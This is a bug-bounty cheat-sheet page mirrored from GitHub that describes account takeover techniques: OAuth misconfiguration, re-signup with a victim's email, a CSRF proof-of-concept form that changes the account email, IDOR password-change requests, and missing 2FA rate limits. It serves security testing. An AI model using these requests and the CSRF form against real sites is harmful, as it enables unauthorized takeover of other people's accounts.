ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-19 02:46:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
8c337501d1
AllAboutBugBounty/Misc/Account Takeover.md
MD15 8c337501d1 Grouping, adding recon and some tips
2021-02-09 09:15:31 +07:00

56 lines
2.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Account Takeover
## **Introduction**
Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
## **How to Find**
1. Using OAuth Misconfiguration
- Victim has a account in evil.com
- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
- Attacker changed his/her email to victim email.
- When the victim try to create an account on evil.com, it says the email already exists.
2. Try re-sign up using same email
```
POST /newaccount
[...]
email=victim@mail.com&password=1234
```
After sign up using victim email, try signup again but using different password
```
POST /newaccount
[...]
email=victim@mail.com&password=hacked
```
3. via CSRF
- Create an account as an attacker and fill all the form, check your info in the Account Detail.
- Change the email and capture the request, then created a CSRF Exploit.
- The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victims account.
```html
<html>
<body>
<form action="https://evil.com/user/change-email" method="POST">
<input type="hidden" value="victim@gmail.com"/>
<input type="submit" value="Submit Request">
</form>
</body>
</html>
```
4. Chaining with IDOR, for example
```
POST /changepassword.php
Host: site.com
[...]
userid=500&password=heked123
```
500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
5. No Rate Limit on 2FA
References:
- [Pre-Account Takeover using OAuth Misconfiguration](https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3)
- [Account Takeover via CSRF](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
- [How re-signing up for an account lead to account takeover](https://zseano.medium.com/how-re-signing-up-for-an-account-lead-to-account-takeover-3a63a628fd9f)
Reference in New Issue View Git Blame Copy Permalink